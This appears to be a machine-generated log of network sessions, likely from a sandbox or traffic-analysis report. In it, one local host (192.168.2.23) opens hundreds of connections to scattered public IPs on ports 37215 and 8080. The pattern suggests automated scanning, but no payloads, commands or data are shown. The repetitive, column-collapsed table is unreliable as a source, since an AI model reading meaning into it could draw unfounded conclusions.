                                                        32736192.168.2.234152241.207.22.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32737192.168.2.2351520157.104.219.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32738192.168.2.2359340157.57.125.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32739192.168.2.233282641.73.55.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32740192.168.2.2334632147.193.199.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32741192.168.2.2333468197.131.39.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32742192.168.2.235681851.223.84.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32743192.168.2.2334514197.10.240.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32744192.168.2.2336840157.224.37.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32745192.168.2.235873841.11.80.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32746192.168.2.2353670171.81.24.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32747192.168.2.234156641.220.90.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32748192.168.2.2350728197.56.1.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32749192.168.2.233845067.96.248.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32750192.168.2.2358592197.190.62.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32751192.168.2.235890241.27.59.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32752192.168.2.2345836157.12.116.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32753192.168.2.234203450.119.147.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32754192.168.2.235358020.158.179.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32755192.168.2.234042841.242.112.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32756192.168.2.2345536157.241.105.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32757192.168.2.2348900197.168.176.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32758192.168.2.2342094156.154.69.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32759192.168.2.234909641.49.112.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32760192.168.2.2360292197.106.68.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32761192.168.2.2354692164.241.48.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32762192.168.2.233452841.193.213.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32763192.168.2.2334572113.133.166.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32764192.168.2.2333282157.189.8.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32765192.168.2.2353710120.247.210.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32766192.168.2.2357028157.216.47.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32767192.168.2.2346450157.157.137.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32768192.168.2.233553841.171.245.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32769192.168.2.2360568197.41.38.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32770192.168.2.233466041.128.118.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32771192.168.2.2349410157.149.199.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32772192.168.2.2336510157.198.107.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32773192.168.2.2350328113.207.27.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32774192.168.2.2340746157.163.45.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32775192.168.2.2341066197.215.113.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32776192.168.2.233651093.70.236.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32777192.168.2.2337964197.56.222.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32778192.168.2.2334442197.161.155.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32779192.168.2.235237214.142.191.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32780192.168.2.2359260197.198.100.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32781192.168.2.2352726197.96.93.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32782192.168.2.2357186157.154.7.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32783192.168.2.2348534197.238.102.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32784192.168.2.2360302143.4.239.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32785192.168.2.235367686.71.16.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32786192.168.2.2345356186.137.103.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32787192.168.2.2338528197.86.182.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32788192.168.2.2347644197.190.82.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32789192.168.2.235325641.201.9.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32790192.168.2.235173669.132.16.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32791192.168.2.2349334115.47.164.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32792192.168.2.2360434197.7.158.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32793192.168.2.2344702197.203.214.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32794192.168.2.2346196157.2.84.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32795192.168.2.2342440157.100.181.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32796192.168.2.236033041.131.84.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32797192.168.2.2360360197.204.27.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32798192.168.2.234706441.82.71.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32799192.168.2.2352920197.190.65.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32800192.168.2.2349430197.183.70.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32801192.168.2.234504641.200.38.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32802192.168.2.2359342197.21.249.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32803192.168.2.234776041.108.91.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32804192.168.2.236083441.168.41.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32805192.168.2.2340926197.254.19.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32806192.168.2.2350540197.56.8.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32807192.168.2.2354346157.89.7.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32808192.168.2.2360500197.239.127.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32809192.168.2.235125441.5.97.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32810192.168.2.2340274157.169.112.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32811192.168.2.233780241.172.37.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32812192.168.2.2339528197.78.208.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32813192.168.2.2342414157.81.68.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32814192.168.2.2334028157.150.163.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32815192.168.2.2344950197.89.202.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32816192.168.2.2340132157.210.189.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32817192.168.2.2358420157.51.91.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32818192.168.2.2347574197.54.243.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32819192.168.2.2349136222.70.16.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32820192.168.2.2344388197.145.103.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32821192.168.2.234511641.77.125.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32822192.168.2.234239481.75.82.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32823192.168.2.2354572179.55.227.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32824192.168.2.2352592157.140.138.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32825192.168.2.234820441.30.24.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32826192.168.2.235459841.100.201.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32827192.168.2.2360650197.27.159.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32828192.168.2.2342326130.254.66.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32829192.168.2.2357286197.165.252.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32830192.168.2.2346676157.106.241.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32831192.168.2.235465641.134.235.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32832192.168.2.2338110157.168.74.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32833192.168.2.2351538197.203.109.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32834192.168.2.2349066217.175.179.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32835192.168.2.2342124197.87.33.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32836192.168.2.2356112197.234.77.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32837192.168.2.235344441.147.226.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32838192.168.2.2347074164.165.78.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32839192.168.2.2341806197.192.241.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32840192.168.2.2339994157.181.104.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32841192.168.2.2354892197.51.198.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32842192.168.2.2355198197.39.6.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32843192.168.2.233905631.159.39.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32844192.168.2.234192441.97.28.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32845192.168.2.2353354157.98.203.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32846192.168.2.2335266197.247.120.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32847192.168.2.2357736157.180.37.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32848192.168.2.2335622157.0.129.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32849192.168.2.235358674.199.213.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32850192.168.2.234291076.47.82.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32851192.168.2.234220241.235.76.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32852192.168.2.2356404197.97.236.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32853192.168.2.2347308101.152.161.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32854192.168.2.2346960157.143.70.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32855192.168.2.2352710183.119.181.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32856192.168.2.2340228157.239.156.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32857192.168.2.235841041.157.100.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32858192.168.2.2358528197.184.37.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32859192.168.2.235219241.167.38.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32860192.168.2.2345268197.81.211.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32861192.168.2.2359256197.23.75.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32862192.168.2.2354898197.138.122.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32863192.168.2.2332934197.222.231.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32864192.168.2.2349660197.153.190.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32865192.168.2.234034285.183.94.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32866192.168.2.235715092.102.9.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32867192.168.2.2340878189.186.30.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32868192.168.2.233928086.218.24.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32869192.168.2.2349962185.130.49.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32870192.168.2.2352978147.56.117.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32871192.168.2.2354228149.168.188.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32872192.168.2.2335124131.47.208.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32873192.168.2.2336274209.216.96.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32874192.168.2.2350752202.200.151.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32875192.168.2.2359278205.218.167.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32876192.168.2.2337702200.185.33.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32877192.168.2.2346298113.4.33.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32878192.168.2.2347718203.108.209.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32879192.168.2.2337622192.254.209.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32880192.168.2.2341742126.56.220.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32881192.168.2.234742640.177.236.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32882192.168.2.2342848188.182.178.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32883192.168.2.2334554155.121.90.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32884192.168.2.2348900126.1.115.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32885192.168.2.2335644120.83.51.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32886192.168.2.235040059.243.240.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32887192.168.2.2338020170.107.40.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32888192.168.2.2337540137.45.82.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32889192.168.2.2345256204.150.203.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32890192.168.2.233332076.211.132.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32891192.168.2.2346604217.82.203.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32892192.168.2.2348234201.168.125.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32893192.168.2.2358736100.131.171.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32894192.168.2.2350548191.52.3.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32895192.168.2.2351626206.181.107.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32896192.168.2.235718295.208.208.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32897192.168.2.233979888.247.81.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32898192.168.2.2343608117.255.136.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32899192.168.2.2352610117.203.112.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32900192.168.2.2356144205.228.76.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32901192.168.2.235957870.216.79.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32902192.168.2.2332934152.118.52.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32903192.168.2.2356384165.32.188.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32904192.168.2.235732098.32.95.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32905192.168.2.233373250.100.60.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32906192.168.2.2358626194.23.199.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32907192.168.2.23567541.224.238.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32908192.168.2.234548654.150.30.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32909192.168.2.233575881.46.80.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32910192.168.2.234713874.188.70.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32911192.168.2.2336740165.144.39.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32912192.168.2.233576699.218.149.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32913192.168.2.2338634109.6.122.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32914192.168.2.235622423.60.176.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32915192.168.2.2339294199.123.110.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32916192.168.2.235570477.1.250.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32917192.168.2.235196490.159.176.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32918192.168.2.2334450117.240.165.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32919192.168.2.235896464.248.64.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32920192.168.2.233797435.39.120.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32921192.168.2.2333540184.129.31.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32922192.168.2.2344000181.19.102.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32923192.168.2.234979250.130.68.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32924192.168.2.2334598142.135.218.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32925192.168.2.23363402.196.107.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32926192.168.2.234291483.212.234.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32927192.168.2.2354344103.163.22.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32928192.168.2.235131298.57.154.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32929192.168.2.235208258.234.168.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32930192.168.2.2338832147.143.119.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32931192.168.2.2352510211.78.8.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32932192.168.2.2351976203.247.90.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32933192.168.2.2354740100.139.94.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32934192.168.2.2357854210.73.44.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32935192.168.2.235573618.64.138.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32936192.168.2.2337442118.55.203.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32937192.168.2.2356008185.124.124.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32938192.168.2.23559424.13.137.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32939192.168.2.2351988159.163.170.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32940192.168.2.2342458179.92.211.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32941192.168.2.2359748151.175.82.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32942192.168.2.2346842144.60.44.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32943192.168.2.235209819.134.130.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32944192.168.2.2345004194.159.85.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32945192.168.2.2339386151.74.1.2208080
                                                        TimestampBytes transferredDirectionData


